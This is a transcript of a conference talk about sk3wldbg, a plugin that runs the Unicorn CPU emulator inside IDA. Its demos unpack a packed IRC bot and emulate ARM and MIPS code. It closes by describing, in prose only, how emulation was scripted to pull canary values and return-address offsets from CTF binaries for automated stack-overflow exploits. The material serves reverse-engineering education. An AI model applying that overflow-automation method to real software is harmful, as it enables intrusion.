All right, DEF CON. So, you're at the last talk of the evening. Please welcome Chris Eagle. All right, thanks very much. Can everybody hear me? Can't hear you? Can't hear me? Good. That's where I was going to stay. I'm Chris Eagle. Thanks for coming. We've got the Mr. Robot machines back here. I don't know, I'm about tired of them. Oh, where'd my sheep go? She wandered off. Okay. Wrong angle. Not her best side. Okay, I'm here to talk about a project that I've been working on called, for lack of a better name, sk3wldbg. It's about emulating various processors using the Unicorn emulation framework that was released at Black Hat last year. And because it's kind of what I do, it's all baked into IDA. We'll see if it's interesting, go through a couple of examples, watch things crash, and hopefully have some fun. Got to say this: everything I say today is my own opinion, not that of my employer and certainly not that of DARPA. They don't let me talk on their behalf. A little bit about me, if you don't know me; these folks down here in the front row are filling seats to make the room look full. I'm a senior lecturer of computer science at the Naval Postgraduate School in Monterey, California. I've been doing security-related stuff for a long time now. I do a lot of reverse engineering of various sorts and play a lot of capture the flag; I'll be racing back over there right after this talk is over. And I'm a performer of really stupid IDA tricks, proving that just because it can be done doesn't mean it should be done. But that's what you're here to watch, I guess. So this is really about CPU emulators. They're useful in a lot of cases where you may not have the hardware to run a particular piece of code on, whether it's a well-structured binary or just a small snippet of something like shellcode, and you don't happen to have an ARM device or a MIPS device or a SPARC device sitting around and you want to know how this thing behaves.
So you're either going to become the world's best human MIPS engine, and interpret this stuff in your head and figure out what's going on, or you might want some help. That's what I was looking for when I started thinking about baking emulators into things like IDA. In my particular use case IDA is virtually my desktop; I'm in it all the time. And I often have the desire to step out and execute something, because perhaps my comprehension of the instruction set is not sufficient for me to understand what I'm reading, or I just want to verify my suspicions about the behavior of a section of code. I'd like to run through it, but perhaps not an entire executable. Maybe I don't want to have to load up the ELF and deal with the kernel loader, the operating system, libraries, and a full-blown execution environment just to run through five or ten lines of code. So I thought about this and decided that if I could just run these lines of code any time I wanted in some very stripped-down environment, wouldn't that be nice. We'll talk about how I got there from here. You also may want to run code for obsolete platforms because you don't have real hardware to do it on. There are plenty of software emulators out there these days that do these kinds of things, but that's another use case for emulation. And there's another one I missed, and I'm not going to go back. So emulators run the gamut, starting from the simplest emulators there are. Unicorn is in fact a fairly simple emulator. In fact, it's not itself an emulator; it's not a standalone thing. It is an API that lets you point at instructions and execute them one or more at a time, receiving some signals along the way. You can hook into it and get callbacks and so on. And I'm really not going to talk about the inner workings of Unicorn.
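To make the "point at instructions, execute one or more at a time, get callbacks" model concrete, here is a minimal toy sketch. It is not Unicorn's API: the three-instruction bytecode, the `ToyCPU` class, and every method name are invented for illustration only.

```python
# Toy model of a "scriptable CPU" API. The bytecode below is invented for
# illustration; it is not a real ISA and this is not Unicorn's interface.

class ToyCPU:
    # opcode -> (mnemonic, instruction length in bytes)
    OPS = {0x01: ("load", 3), 0x02: ("add", 3), 0x03: ("dec", 2)}

    def __init__(self, mem_size=256):
        self.mem = bytearray(mem_size)   # flat emulated memory
        self.regs = [0, 0, 0, 0]         # four 8-bit registers
        self.pc = 0
        self.code_hooks = []             # callbacks fired before each instruction

    def mem_write(self, addr, data):
        self.mem[addr:addr + len(data)] = data

    def hook_code(self, callback):
        self.code_hooks.append(callback)

    def step(self):
        """Execute exactly one instruction at the current pc."""
        name, size = self.OPS[self.mem[self.pc]]  # KeyError models an invalid opcode
        for cb in self.code_hooks:
            cb(self, self.pc, size)
        r = self.mem[self.pc + 1]
        if name == "load":               # load rN, imm8
            self.regs[r] = self.mem[self.pc + 2]
        elif name == "add":              # add rN, rM
            self.regs[r] = (self.regs[r] + self.regs[self.mem[self.pc + 2]]) & 0xFF
        elif name == "dec":              # dec rN
            self.regs[r] = (self.regs[r] - 1) & 0xFF
        self.pc += size

    def run(self, begin, until, count=0):
        """Run from begin until pc == until, or for count instructions if count > 0."""
        self.pc = begin
        executed = 0
        while self.pc != until and (count == 0 or executed < count):
            self.step()
            executed += 1
        return executed


trace = []
cpu = ToyCPU()
# load r0, 5 ; load r1, 7 ; add r0, r1 ; dec r1
code = bytes([0x01, 0, 5, 0x01, 1, 7, 0x02, 0, 1, 0x03, 1])
cpu.mem_write(0x10, code)
cpu.hook_code(lambda c, addr, size: trace.append(addr))
cpu.run(0x10, 0x10 + len(code))
print(cpu.regs[:2], [hex(a) for a in trace])
```

The shape is what matters here: the caller owns memory and registers, chooses where execution starts and stops, and observes each instruction through a hook. There is no loader, operating system, or device model anywhere in the picture.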
But I would encourage you to go out and find some of the slide decks that they posted following Black Hat last year. There are some other presentations they've given at a variety of conferences. And dig into the project if you think you have a use for baking an emulator into anything. It is to execution of instruction sets what Capstone is to disassembly of instruction sets: a fairly general-purpose framework across many architectures that lets you script things up very quickly. In this case we're going to execute things in just a few lines of code. That's the basics of Unicorn, and all I'm going to get into. There are some fairly sophisticated emulators out there, and I will refer to those later on. But with Unicorn you literally point at an instruction, it updates the internal state of the emulator, and that is it. If that instruction manipulates hardware, you're not going to get anything like that. So a full-blown emulator like QEMU isn't what you're going to get out of Unicorn. The idea with this project was to build a lightweight CPU emulator available in a static reverse engineering context. I didn't want to have to go full-on dynamic analysis with debuggers, processes, hardware, operating systems, any of that stuff. I just wanted a very lightweight emulator that would let me step through code. We can expand on it from there, and I'll go into a little bit of the history and what led me here in a couple of slides. The idea is you're looking at some code. We step out of that static context. We execute through some instructions in this emulated manner. And then we take the knowledge that we gained by observing the execution state.
We use it either to enhance our understanding of the binary or to incorporate some of that information back into our static picture, perhaps to improve a disassembly, make some annotations, what have you. Maybe something as simple as using a loop that you see in some code to decrypt, decode, or deobfuscate whatever it might be, whether that is itself code (self-modifying code) or some data, some strings, anything like that, and then bring that information back into our static analysis without having to continue execution. So the end result is what I'm going to talk about today. It's this lightweight emulator that I baked into IDA, because if it's not in IDA I'm probably not going to use it. IDA provides my static analysis side, my disassembly side, and the emulator, as I mentioned previously, is based on the Unicorn framework. I'm going to blow through these slides. I imagine if you're sitting in this room today you're probably familiar with IDA. If you're not, it's a commercial disassembler. There are some other disassemblers out there, and we're seeing new ones every day. Binary Ninja is a new one that was just released, and maybe we can take this project and integrate it with that someday. But for now I'm primarily working in IDA. It supports a lot of different processor families, and to me that made it attractive to marry up with Unicorn, which also supports a lot of different processor families. Not as many as IDA does, but more than one, more than two, more than three; I don't know, six or so. I'll list them out here in a minute. But it meant that IDA could understand all of the code that I would ever want to emulate in Unicorn, because the processors that IDA supports are a superset of the architectures supported by Unicorn. IDA itself has integrated debugging support, so actual dynamic analysis.
Fire up a process, attach to it, and pull in state, for x86 and ARM targets; it can also do some remote debugging on some other targets. It also has a decompiler for 32- and 64-bit x86 along with 32- and 64-bit ARM, but that's not entirely relevant to our talk today. Unicorn, as I mentioned, was introduced at Black Hat last year. It comes out of the same group that did Capstone, the disassembly framework. And now they have a tool called Keystone. In fact, they may have talked about it at Black Hat. Anybody at Black Hat? Did they do Keystone this year? Yep. So they talked about their new project, Keystone. I hope these guys keep coming back. That's like three years in a row: Capstone, Unicorn, Keystone. They're all pretty useful projects. Keystone is their assembly framework. So now we have a disassembly framework, an assembly framework, and an emulation framework, and when you start rolling these things together you get some pretty powerful reverse engineering capabilities. The link out to their site is up there on the slide. Unicorn as an emulation framework is actually based on QEMU. If you've ever used QEMU, you know that it also supports a large number of architectures, and you might say, well, why do we have Unicorn if QEMU supports a large number of architectures and Unicorn is in fact based on QEMU? Isn't this just the same thing all over again? The answer is not quite. QEMU has a lot of support all the way down into hardware shims that lets you do full-blown system emulation. We can boot Linux, we can boot Windows in QEMU environments because it has that support for hardware interfaces, virtual devices, and so on. The Unicorn folks were not interested in any of that. All they wanted to do was be able to emulate processor instructions.
They don't want the hardware interface; they're not trying to provide you network and video drivers or any of that stuff. They just wanted to help you emulate instructions. What they did was tear into QEMU and rip out all of that hardware abstraction layer, and they were left with effectively only the processors, the software CPUs, that they then layered on top of. We instantiate a processor, we give it some state that it can manipulate, and they give you access to that processor state and nothing more. They expose some of that through a couple of different types of APIs, and there you have it: the scriptable emulator. It supports the processor families that you see here: x86, both 32 and 64 bits, the same for ARM, plus SPARC, MIPS, and Motorola 68000. That's not all of the processor families that are supported by QEMU, but it's a start. It does take a fair amount of work to provide the interface to a given processor architecture, but I don't think it would be a stretch to add in some of the other processor families that are supported by QEMU if you wanted to enhance the capabilities of Unicorn. A number of projects, and this is just one of them, have come along which make use of Unicorn. Some of them are pretty amazing, and they're baked into a lot of very interesting analysis frameworks. I posted a link at the bottom because you may be more interested in those than in Unicorn itself, because they provide somewhat more finished products. These are things that you'd make use of right out of the box if you didn't have a need to script an emulator of your own. So you can go find those out there and play around. So I picked IDA and I picked Unicorn. There are some other emulators, as I've mentioned. I talked about QEMU already.
Well, I haven't talked about Bochs. Bochs is another one. It is a pure x86 emulator. These are blurbs off of each of their project pages: Bochs is a highly portable open source 32-bit x86 emulator, while QEMU is a more general, generic open source machine emulator and virtualizer that covers more processors. It is a little bit more sophisticated than Bochs, but there is also a lot more to it than Bochs. So I could have gone with either of these, I suppose, but they really weren't geared for you to script around them and access just the processor bits. So this is sort of where I've been with this project. It's been kind of a long road. Unicorn came along and filled a need that I had, and actually fulfilled a vision that I had back in 2003 when I built a tool called the IDA x86 emulator, where I wanted to do exactly what I described. I wanted to sit in IDA and just emulate things, and use that either to transform my static analysis picture or to enhance my understanding of the behavior of something. At the time that I did that, I looked at those emulators, primarily Bochs and QEMU back then, and thought, can I rip into this, strip out the bits I don't need, and take just the emulator? I looked at it, and I'm lazy, and I said, hell no, because they're way too big. So 13 years later, 12 years later, somebody did it for me. So I revisited this project and retooled, and that's again why I'm here talking today. Somebody did all the heavy lifting by stripping all the unnecessary stuff out of QEMU and dropping it in my lap. Along the way, the Hex-Rays folks did an integration between IDA and Bochs. They did it in a slightly different way.
I'll do two quick demos later on of what these things look like and the different approaches that you might take as you think about doing emulation in combination with static analysis. They released a Bochs debugger module that IDA could communicate with. If you're familiar with IDA, you understand what the debugging views look like in contrast to the pure static analysis views, and we'll see that here in a few minutes. I did a similar thing for the MSP430 processor, which was the processor that got used for the Microcorruption challenges. If any folks have seen those, they're a lot of fun. That was a pure MSP430 implementation; I didn't want to deal with their clunky user interface through a browser, so I did this emulator. It was in a style very similar to x86emu. And then along came Unicorn, and it took me a while, but I finally decided to integrate it into IDA to see if I liked it better, or if it proved more useful than some of these other combinations of tools. As I mentioned, I looked at QEMU and Bochs briefly, but it was going to be a lot of work. I didn't have the time to do it all, and again, somebody else came along and did it. And because their approach finally gets QEMU involved in this whole thing, it gives us a lot more processors than my particular approach, which was specifically an x86 emulator. I had that one narrow architecture, and I never wanted to do another one, because doing an architecture from scratch was just more work than I wanted to get involved with. So this was a nice marriage for me. Now, to the implementation. In implementing this, I had to make a couple of choices. Hopefully people are somewhat familiar with IDA and what it looks like.
With IDA, you get your standard disassembly view, and then there's this debugging view. But you have to do a little bit of work to integrate what you learned from the debugger back into the disassembly view, and oftentimes it involves overwriting a lot of information in your disassembly view. So you might go into the debugger and learn something, but it's fairly transient in nature, because you're starting a process, eventually that process is going to terminate, and the information that you learned vanishes with that process. There are ways to migrate some of that information back into IDA, overwriting your original data in IDA, but you'd have to automate some of that, and it's not necessarily a very clean approach. The alternative approach is that you don't jump out into a debugger, and you find some way to incorporate emulation right there alongside your static analysis view. In order to do that, your emulation has to be able to maintain state, so you have to decide where that state lives relative to what you're looking at in IDA. In IDA you get to see an entire disassembly, through the various portions of a program: your code, your data, et cetera. What you don't have are things like a stack or a heap, any of your runtime-allocated memory. But you need that in the emulation.
So you either start modifying your database and adding all of those bits and pieces in there, so that you expose them and make them available to view and navigate through, or all of that information remains buried in the emulation, and you have to come up with some way to propagate just what you want up into the static analysis view when you're ready to consume it, when you've decided that you've learned what you wanted to learn and you're ready to annotate that static analysis. When I did x86emu, I took the first approach: you're literally emulating on top of an existing IDA database, so as you do the emulation, your database gets modified. There are advantages and disadvantages to that approach. The disadvantage is obviously that it's destructive. If you're an IDA user, you know there's no undo in IDA, so once you've modified something, there's no going back. If you want to see what it used to look like, you're maintaining a separate copy of the database, and it becomes a headache. But I have found it to be useful in many cases. The alternative is to take a debugging sort of approach. Generally speaking, in IDA that means you're launching a process and attaching to it the way a standard debugger would: controlling the process, viewing the state of the process, using IDA as a viewer. You see what the running process state is, and it gives you access to all the things you'd have in a typical debugger. In this case, you're not manipulating your static view at all. The IDA database doesn't get changed unless you absolutely want it to. Your view is strictly into that transient process.
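The difference between the two designs can be sketched with two small memory models. This is only an illustration under stated assumptions: a plain `bytearray` stands in for the IDA database, the class names are hypothetical, and a single-byte XOR loop stands in for whatever code the emulator would actually execute.

```python
class InPlaceMemory:
    """Destructive model: emulated writes go straight into the database bytes."""

    def __init__(self, database):
        self.db = database               # shared bytearray, modified directly

    def read(self, addr):
        return self.db[addr]

    def write(self, addr, value):
        self.db[addr] = value & 0xFF


class OverlayMemory:
    """Debugger-style model: writes land in a private overlay, database untouched."""

    def __init__(self, database):
        self.db = database
        self.overlay = {}                # addr -> byte written during emulation

    def read(self, addr):
        return self.overlay.get(addr, self.db[addr])

    def write(self, addr, value):
        self.overlay[addr] = value & 0xFF

    def commit(self):
        """Explicitly push what was learned back into the database."""
        for addr, value in self.overlay.items():
            self.db[addr] = value
        self.overlay.clear()


def xor_decode(mem, start, length, key):
    """Stand-in for an emulated decode loop: XOR each byte with a key."""
    for addr in range(start, start + length):
        mem.write(addr, mem.read(addr) ^ key)


KEY = 0x5A                               # hypothetical key for the demo
original = bytes(b ^ KEY for b in b"JOIN #chan")

db_a = bytearray(original)               # database used destructively
xor_decode(InPlaceMemory(db_a), 0, len(db_a), KEY)

db_b = bytearray(original)               # database left alone
overlay = OverlayMemory(db_b)
xor_decode(overlay, 0, len(db_b), KEY)
decoded_view = bytes(overlay.read(i) for i in range(len(db_b)))

print(bytes(db_a), bytes(db_b) == original, decoded_view)
```

With the in-place model the decoded bytes are immediately part of the static picture and the original bytes are gone. With the overlay model the database still holds the obfuscated bytes until `commit()` is called, which mirrors the "unless you absolutely want it to" behavior of the debugger approach.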
And again, when it's done, you're done. Perhaps you learned something; perhaps you used it to update your static view. The way you use that is entirely up to you. This is the approach that the Hex-Rays folks took when they integrated Bochs into IDA. IDA shells out to Bochs; they created some IPC links between IDA and Bochs. IDA pushes the state into Bochs, including the code and the data that are represented in the IDA database, gives it an initial register state, and then tells Bochs to go, single-stepping or allowing it to run freely as you see fit. It then pulls the data back out of Bochs and shows it to you in IDA's debugger view. But again, once you're done, you're done, and none of that updates your static analysis state. As I mentioned, there are some ways to pull state back into IDA, but it's entirely up to you how you're going to do it. I'll show you some demonstrations of the two approaches, and you can use that to understand what I did with Unicorn. In the case of Unicorn, the approach I ended up taking was the debugging approach, because it just felt a little bit cleaner. I didn't want to get into updating databases, and I wanted to leave things flexible for the future; I might come along and implement it differently. But in order to implement it outside of a debugger, IDA doesn't provide you any tools to display something like registers, for example, or any of that execution state. While you're in a static analysis state, registers have no values, so you have to invent that user interface yourself. That's one of the hard parts about doing it outside of the debugger. My wife's sitting up here, and she's probably not liking the slide, I don't know, or agreeing with it.
In any case, I took on this task of trying to integrate IDA with Unicorn. It took a lot of unhappy development time, a supportive wife, and a lot of time dealing with a mostly undocumented IDA interface for a particular style of plugin known as a debugger plugin. For those of you who know IDA, you know the state of its documentation, so I spent a lot of time reverse engineering IDA to try to learn how its debuggers actually work, because there isn't much to go on there. At the same time, I was trying to integrate a piece of software that was really, I say beta, but that's kind of generous; at the time I was doing this, it was more like pre-alpha. So you never know where the problems lie. Is it Unicorn? Is it IDA? Is it me? That's what led to bullet number one. But in the end, I was able to subclass IDA's debugger type to provide debuggers for all of the processor families Unicorn supports, and end up with a debugger-style interface for any one of these architectures that you can use to emulate code wherever you are. So if you're using IDA on Windows with Unicorn and you open up a MIPS binary, you don't have to go find a MIPS platform anywhere. You can just pop out into the debugger and emulate through your MIPS code, and if you want to, you can use IDA's features for pulling some of that information back. The same is true for SPARC, or ARM. What did I say? 68K, x86, 64-bit x86 on a 32-bit platform, or vice versa. So I got exactly what I wanted 12 years ago, with a lot more flexibility.
With this, you can go anywhere from the basic case, I've got five lines of code I want to emulate, to trying to emulate through an actual process. If the code is in the form of an executable like an ELF or a PE, the debugger plugin tries to load that up and map it into an address space that is roughly what you'd get if you were to run it on the actual architecture the binary was intended for. There are a lot of challenges with doing that. We don't get to emulate through the kernel. We don't have a system call interface, although, as I'll talk about later, one of my goals is to add the capability of hooking system calls, so you can stub out some of the more common ones, perhaps, and provide some fake results back up into your emulation. So the debugger includes very basic loaders for PEs and ELFs that load those two file formats into the Unicorn emulation before you start, give you a stack, and so on. If you don't have a format that sk3wldbg recognizes, then all it does is take the entire content of your IDA database and copy it out into mapped sections in the Unicorn emulator. So however it's mapped in IDA, that's what you get in Unicorn. It usually throws in a stack, because that's something you're going to need that you don't ever see in IDA; stacks are pretty useful, and a lot of instructions make use of them. On to some of the issues with doing all of this. If anybody's used Unicorn, you might have some familiarity with building it. IDA is a 32-bit executable. Even though you may see that there's a 64-bit version of IDA out there, all that means is that it can understand 64-bit binaries.
It is still a 32-bit native executable when you go to run it. That means that if you want to integrate with it, you've got to build 32-bit libraries. So when you build Unicorn, you've got to build the 32-bit library for the platform you're running IDA on, whether that's Windows, Linux, or a Mac. Now, Unicorn unfortunately doesn't have very good support for building 32-bit libraries. They sort of assume that everybody's doing 64-bit stuff these days; why would you want to build 32-bit binaries anymore? So we had to fix that up a little bit, and they're getting better at being able to build 32-bit binaries. It also does not have very good support for building on Windows. That's primarily related to QEMU's dependence on GLib, which is not found on Windows platforms unless you reach out and get things like Cygwin or MinGW and install the requisite libraries from those. So this complicates Windows builds; in fact, they don't have Windows builds in their continuous integration when you go observe the state of the project out on their GitHub site. So it makes building on Windows a little bit tough. But it can be overcome, and in the end you're able to integrate Unicorn into IDA on all the platforms for which IDA is available. All right. That's about all I'm going to talk about at a high level. It's pretty straightforward. Here's a disassembler. Here's an emulator. And it either works or it doesn't. So we'll see. I'm going to go through some demos and show you what it looks like. I'm going to start off with some simple deobfuscation stuff and show it to you in a couple of different ways. I'm going to go through it fairly quickly, and I'm going to try not to get bogged down in the details of IDA-isms or how to use IDA or things like that.
I'm just going to show you what each of these things does, what it looks like, and let you form your own opinions as to the utility of each, and perhaps whether you prefer one approach to another. So if this all works out, I'm going to use this old-style emulator. Let's see. I've got to pick the right version of IDA. Okay. We'll do this one. All right. So you may recognize the section name. This is just a UPX-packed binary. And if all goes well here, I'm going to bring up this old emulator. Please work. It's coming. My machine is slow. This is the original x86 emulator that I did in IDA. Good jokes. And what you're going to see here, assuming this works, is a crude debugger-like console that's going to come up. We're not going to leave IDA's static user interface. I'm not happy with this. And we're going to be able to emulate without leaving IDA's common interface here, unless it never comes up. Awesome. Okay. While that's going on, we may as well start the other one. Behind this door, we're going to try to do this with Bochs, IDA's integrated Bochs plugin. In order to do that, we've got to switch our debugger over. You see IDA offers a number of debuggers. It's context-aware: it depends on what platform you're running IDA on and the nature of the binary that you're loading up. You can see one of these is a local Bochs debugger. And assuming I haven't messed this up either and still have Bochs installed properly, if I choose Bochs as a debugger... no, that doesn't do anything. We've got to actually run it, right? So I'll set a breakpoint at the beginning of the code here, and I'll set a breakpoint down towards the end over here. We're not going to execute any of these function calls, because they jump out into Windows libraries. We'll just set a breakpoint down here at the end. Maybe bring up a strings view, to try to convince you that it's actually doing work. All these strings, I don't know if that shows up at all.
But these are the obfuscated strings that are part of the binary. You can see bits and pieces of strings, but it's not fully deobfuscated. And if Bochs lets me do this, then we can start debugging. And this is going to toggle into... maybe a segue back to the other demo. No, there's Bochs starting up. I've got too much going on in this machine. So IDA started off Bochs, and it's got this IPC channel between the two. Now IDA gives us a debugger view. We're not really running the process; all the emulation data has been stuffed into Bochs, and Bochs is going to do its thing. But this is a standard IDA debugger view. If you were running a process and actually attached to it, this is what you'd see. It's not the best user interface in the world; it's probably the number one knock against using IDA as a debugger. But we can step through it, and the register state updates up here and so on. And we can let it run, and we should hit our second breakpoint at some point down there. And we can go back and look at the strings in the binary, maybe, if I did this right. You're just going to have to trust me. I need one of those things. Yeah. Wow. It's got to pull these strings out of Bochs memory. All right. Let's see how our other thing is doing. Look at that. It's like a cooking show; we've got a couple of things in the oven at a time. So this is back to the emulated view, IDA x86emu. Totally different view. We never leave the normal IDA interface, and you've got this tiny little panel that pops up. It's very specific to x86, so taking this approach with other architectures, you would have to come up with your own interface and replace all the x86 registers with whatever registers you have for that particular architecture. It lets you do some things like manipulate memory. Memory is really just the database; everything you're manipulating is just a change to the database. That's your memory store.
You fetch bytes out of the database. You emulate them. You modify the database if that's what the instruction says to do. But again, it's destructive. So we can sit here and I can click on step, step. It's hard to see, but if you watch the blue here (it doesn't really highlight), that blue is stepping through various instructions. We'll jump down, and it follows through, and so on. And I can reach down to the same part of the binary, which is down here before these function calls, set a breakpoint, and say run. This is much slower than Bochs, because all the interactions with the IDA database are pretty slow. But we hit our breakpoint, and we can go back to our strings window and set this thing back up again. And we should have lots of hits. We have interesting strings, like this. This is just an old IRC bot, but we got all these strings out of it because it's mostly deobfuscated. And then you say you're done. We close this up, and you go back here, and in fact what was formerly empty space is now code that we can go and disassemble. We didn't hop into any debugger. We've destroyed our database; it doesn't look like it used to look. But what we can do is go back here, where we've got deobfuscated code, and just continue doing static analysis at this point. So it's a quick in and out. I considered that approach, and but for the user interface aspect of it, I might have gone that way. Now let's see if Bochs is behaving for us. Over on the Bochs side, we've got hopefully the same strings somewhere. Yeah. We got all this library code. I have no idea where that's even coming from. Well, here we go. So here, again, it's an IRC bot, and you can see registry keys in there that it's going to reference and so on. So we get the same result, but we haven't modified the IDA database at all. So it's like a running process.
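The "rerun strings after the decode loop finishes" trick used in both demos can be approximated outside IDA with a simple printable-run scan over a memory snapshot. The sketch below is an assumption-laden stand-in: the `ascii_strings` helper is hypothetical, the buffer is a tiny made-up region, and a single-byte XOR replaces the packer's real decoding.

```python
import re


def ascii_strings(memory, min_len=4):
    """Return (offset, text) for each run of printable ASCII at least min_len long."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [(m.start(), m.group().decode("ascii"))
            for m in pattern.finditer(bytes(memory))]


KEY = 0xA5                               # hypothetical single-byte key for the demo
plain = b"PRIVMSG #ops"

# Snapshot of "memory" at the first breakpoint: the string is still obfuscated.
memory = bytearray(b"\x00\x01" + bytes(c ^ KEY for c in plain) + b"\x00")
before = ascii_strings(memory)

# Stand-in for letting the emulator run the decode loop to the second breakpoint.
for i in range(2, 2 + len(plain)):
    memory[i] ^= KEY
after = ascii_strings(memory)

print(before, after)
```

Comparing the scan before and after execution is a quick sanity check that the emulated loop really did something, independent of which emulator produced the memory.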
Okay. And I would have to then extract this from Bochs back into IDA, right, if I wanted to make this data permanent. So this is, again, the approach that I took. And now we'll go do this a different way. And this is where, if we thought those demos were bad... let's see how we do here. Set a breakpoint up here. Try to set a breakpoint in the same place down here. Okay. And this time I'm going to switch my debugger over. And if it's installed appropriately, it'll show up as School Debug (sk3wldbg). So we do this. And we go back up here to the beginning. And we try to kick this off. Hopefully I hit my first breakpoint. Okay. And then the plug-in looks a lot like Bochs, right? But this is Unicorn handling this particular emulation. And so you get register state over here, just like you do in Bochs and any other debugger and so on. And at this point we can just step through and it tracks along, and I can let it run. All right. And we'll do the whole strings trick. See if we get anything interesting. Right now there's not much but the names of the couple of libraries that get imported. And we go back over here and we let it run. Just hit go here. Hit our breakpoint. Come back, rerun strings. And like the other two emulators, now we've got all of these strings extracted from memory. And if we go down to the bottom of the self-decoding loop, we can jump up and, very much like Bochs, this is the extracted code, which we can then turn into code up here in our emulator, or in the debugging session. But again, I don't have that back in my database. And when I go to quit this, I'm right back where I started from. And I don't have any strings. And if I follow the jump, up here you can see it's empty, because this is the region in the binary that it unpacks itself into. So it's very much like a debugger and not a static, you know, overwriter or whatever you might want to call it. Okay.
So that's it emulating 32-bit x86 code on 64-bit Windows. Let's see what else I think I'm going to do. Okay. Local ARM emulation. So: Windows platform, no network connections, no ARM hardware. Somewhere I've got an ARM binary open. Let's see where this one comes from. Let me find the right binary. There we go. Okay. This is an ARM binary from an old DEF CON capture the flag. Shout out to LegitBS. One of their first CTFs. But it's an ARM binary on Windows. And actually IDA is not going to offer me any of its own debuggers, because it has no clue what to do with this. ELF binary, ARM, on Windows, right? Don't do ELF. Don't do ARM. But my debugger recognizes the architecture at least, so it says, I'm available. And it's the only debugger that says it's available, so IDA has already selected it up there. And we can kick this off. And now we're debugging ARM, more or less, in emulation. Don't worry about that. Awesome. Let's see where it goes. So there's some memory mapping problems there. Let's see. Not going to work. Clapping for my crash. It's all good. Look at that. We'll just pass all these exceptions down. And it looks like it's advancing. And maybe it's even updating registers. Okay. R2 is actually equal to 1 at this point. Look at that. I left this open, and it had some stale state, and I think it's not happy with me. But that's the idea, right? We're in a debugging session, and we can jump in and out of this without having to fire up an ARM environment or do any communications to a remote ARM device. And then when we're done, we step out, and we're back in our IDA disassembly session. Okay. What else? Oh, now MIPS. Let's see. MIPS, I don't even have any idea how to read. All right. So somebody out there probably says, that's MIPS. I don't know. IDA thinks it's MIPS. Again, no MIPS debugger in IDA. I can't switch my debuggers. There's no other debugger option. But you can see that. No, don't do that.
All right. School Debug is selected. Okay. So we try to hit go here. And hopefully we hit our breakpoint, from which maybe we can step out of this. Step. Okay. Although I don't have a stack. This is probably a bad choice. Let's see. Step. Step. Step. Step. All right. And we're emulating our way through MIPS code. Okay. Yes. Five minutes. Great. Because I am tired. So we hop out of that, and we're, again, back to our disassembly view. And I'm not going to go into the ways you integrate, you know, what you have available in your disassembly view and what you have available in your static view. But suffice it to say, there are ways to pull information back across if you decide that it's useful for augmenting what you have on the static side. Okay. The last thing I'm going to do is take a look at one of the challenges from DEF CON qualifiers this year. And what this was, was a binary, and they gave you a thousand of them. And when you went to interact with the competition, right, they asked you, you know, how many... And you had one minute to craft an exploit for one of these thousand binaries that they gave you the file name for. So you downloaded a thousand binaries and you had a minute to craft the exploit. It's going to take a long time to do all that by hand. So you want to automate this, and you want to have an answer in your hip pocket when they say, give me your exploit for binary number one. So how do you automate? Well, it turns out that all of these binaries have roughly the same path. And I'll describe it not by looking at the code, but by looking at the stack, and there are two buffers in here. And all of the binaries differ in the location of that user input buffer in the stack relative to the saved return address, the size of that user input buffer in the stack, and then the content that gets placed into what I've called a canary string right there. Okay.
So they gave you a free overwrite out of that user input buffer. So you have to figure out, how much do I have to overwrite to clobber EIP? And after you've done that, which is not a problem, there's nothing hindering the overwrite, they come back and verify that the canary string matches the original canary that they placed in there. So as you do your overwrite, you've got to rewrite the canary in there, and it had better match their original string. But all thousand binaries have a different canary, and it's not always obvious exactly how they set it. They compute it. They copy it in one byte at a time. They do a string copy. They do it a lot of different ways. But they always end up doing a string compare at the end. So if you can put a breakpoint at the string compare and hit it, it doesn't matter what you filled the buffer with. You can do some other computations to figure out the distance from the start of your buffer to saved EIP. Set a breakpoint on the string compare, look at the required argument that's sitting on the stack and pick that out, and these become your parameters. What's my canary got to be? How far is it from EIP all the way down to the buffer? And there were a couple of other constants that you needed to pick out, but I didn't want to do this a thousand times by hand. Nobody did. And there are some good write-ups about using some other automated systems to solve this, but what I did was I scripted up this emulator, and the emulator, let's see, somewhere this script exists. Down here, you see things. Because this is implemented as an IDA emulator, right? I'm sorry, IDA debugger. All of IDA's debugger scripting can be used to drive this thing. So we write the script. We load the debugger. We set some debugger options to break on start. We run to the start address. We do some things. Okay.
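As a rough illustration of how the parameters just listed turn into an input, the following Python sketch builds an overflow buffer that rewrites the canary in place and then clobbers the saved return address. It is a sketch under stated assumptions, not the speaker's script: the function name and parameter names are hypothetical, the canary is assumed to sit between the user buffer and the saved return address, and the target is assumed to be 32-bit little-endian x86. Whether the canary needs a terminating NUL, and whether any bytes are unusable as input, depends on how a given binary reads its input, so that is left to the caller.

```python
import struct


def build_payload(canary_offset, canary, ret_offset, new_eip, filler=b"A"):
    """Build an overflow buffer for the layout described above.

    canary_offset: bytes from the start of the user buffer to the canary
    canary:        exact bytes the binary expects to find in the canary
    ret_offset:    bytes from the start of the user buffer to saved EIP
    new_eip:       32-bit value to place in the saved return address
    (All four names are hypothetical; they mirror the talk's parameters.)
    """
    if len(filler) != 1:
        raise ValueError("filler must be a single byte")
    canary_end = canary_offset + len(canary)
    if canary_end > ret_offset:
        raise ValueError("canary would overlap the saved return address")

    payload = filler * canary_offset               # fill the user buffer
    payload += canary                              # rewrite the canary intact
    payload += filler * (ret_offset - canary_end)  # pad up to saved EIP
    payload += struct.pack("<I", new_eip)          # little-endian overwrite
    return payload


example = build_payload(
    canary_offset=16,
    canary=b"CANARY\x00",
    ret_offset=32,
    new_eip=0xDEADBEEF,
)
```

The point of the structure is that only three numbers and one string vary per binary, which is what makes the problem scriptable.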
We get the value of EIP, and I'm picking out all of the arguments, all of the bits and pieces, from a dynamic environment, although I'm not actually running a process. I'm just emulating through it. And by the time I get down to the bottom, I've picked out a bunch of parameters that I'm going to need. And what I did was I just took those parameters and wrote them out as a Python dictionary entry. And so I had a dictionary of parameters. When they told me which binary they wanted exploited, I said, well, I named it. My key into my dictionary is the name of the binary. I pick out the parameters, I craft my buffer and fire it at them. And what that looks like is this. Okay. So I'll run IDA in batch mode. And then I'll be done, I promise. We've got this one and we've got which one? This one. Okay. So I've got two windows right here. I'm tailing an output file on the bottom. I'm going to use IDA in batch mode. You can see the long command line there. And what I'm going to do is run that script that I wrote, and I'm going to run it against one of these thousand binaries. Well, in this directory there's three hundred of them, and they all scroll up like that. And we'll see if this will work. I'm going to make sure I clear out some stale files. Mainly I've got to kill that IDA session because it's going to get in the way of the batch run. And we'll try this out. Now you'll see IDA flash; you have to look in the background, if everything works. So IDA is coming up in batch mode. We're in debugger mode. It's done. You can see the output down on the bottom. That quickly, it got into an emulation on that ELF binary, ran through main, picked off the parameters it needed and dumped them out to me. Now 